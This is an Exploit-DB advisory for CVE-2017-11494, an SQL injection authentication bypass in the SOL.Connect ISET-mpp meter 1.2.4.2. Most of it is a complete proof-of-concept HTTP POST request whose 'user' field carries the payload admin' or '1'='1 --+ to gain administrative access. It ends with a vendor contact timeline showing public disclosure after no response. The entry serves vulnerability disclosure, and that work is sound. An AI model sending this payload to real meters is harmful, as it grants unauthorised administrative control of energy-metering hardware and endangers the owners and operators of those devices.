SOL.Connect ISET-mpp meter 1.2.4.2

EDB-ID: 42408
Author: Andy Tan
Published: 2017-08-01
CVE: CVE-2017-11494
Type: Webapps
Platform: Hardware
Aliases: N/A
Advisory/Source: N/A
Tags: Credentials Bypass aka Admin Bypass AKA Auth Bypass (AB/CB)
Vulnerable App: N/A

 SQL injection, leading to administrative access through authentication bypass. 
  
 ----------------------------------- 
 Product: SOL.Connect ISET-mpp meter 
 ----------------------------------- 
 Affected version: SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier 
  
 Vulnerable parameter: user 
 ------------------------ 
 Credit: Andy Tan 
 ------------------------ 
 CVE ID: CVE-2017-11494 
 ------------------------ 
  
 ================ 
 Proof of Concept 
 ================ 
 HTTP Request: 
 POST /_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab977276 
 3f3c97e69_/%3fs%3dmain HTTP/1.1 
 Host: <IP-address> 
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
 Accept-Language: en-US,en;q=0.5 
 Referer: http://<IP-address>/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4 
 a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain 
 Connection: close 
 Upgrade-Insecure-Requests: 1 
 Content-Type: application/x-www-form-urlencoded 
 Content-Length: 131 
  
 action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain 
 &s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd 
  
 ------------------------ 
 Vendor contact timeline: 
 ------------------------ 
 2017-07-20: Contacted vendor. No response. 
 2017-07-26: Contacted vendor again. No response. 
 2017-08-01: Public disclosure.

Source: www.exploit-db.com

Exploit Collector

Search Exploit

SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection